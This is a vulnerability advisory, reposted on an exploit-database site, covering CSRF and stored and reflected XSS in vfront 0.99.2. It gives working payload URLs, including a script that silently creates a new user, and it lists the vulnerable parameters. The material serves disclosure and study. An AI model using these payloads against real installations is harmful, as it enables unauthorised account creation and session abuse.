0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

vfront 0.99.2 CSRF & Persistent XSS Vulnerabilities

Author

John Page

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

# Exploit Title:  CSRF & Persistent XSS
# Google Dork: intitle: CSRF & Persistent XSS
# Date: 2015-06-02
# Exploit Author:  John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: www.vfront.org
# Software Link: www.vfront.org
# Version: 0.99.2
# Tested on: windows 7
# Category: webapps
 
 
Product:
===================================================================================
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
 
 
 
Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS
 
 
 
Vulnerability Detail(s):
=======================
 
 
CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.
 
 
Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.
 
 
Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)
 
 
Exploit code(s):
===============
 
 
CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All
 
 
 
Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>
 
 
 
Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
 
 
 
XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
 
   
 
Disclosure Timeline:
===================================
 
 
Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure
 
 
 
Severity Level:
===================================
High
 
 
 
Description:
==========================================================
 
Request Method(s):
                                [+]  GET & POST
 
Vulnerable Product:
                                [+]  vfront-0.99.2
 
Vulnerable Parameter(s):
                                [+] altezza_iframe_tabella_gid
                    passo_avanzamento_veloce_gid
                    n_record_tabella_gid
                    search_limit_results_gid
                    max_tempo_edit_gid
                    home_redirect_gid
                    formati_attach_gid
                    default_group_ext_gid
                    cron_days_min_gid
                    id_campo
                    op
                    
 
 
Affected Area(s):               [+]  Admin & MySQL DB
 
===============================================================
 
 
 
(hyp3rlinx)

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

vfront 0.99.2 CSRF & Persistent XSS Vulnerabilities

Report Error

Report Error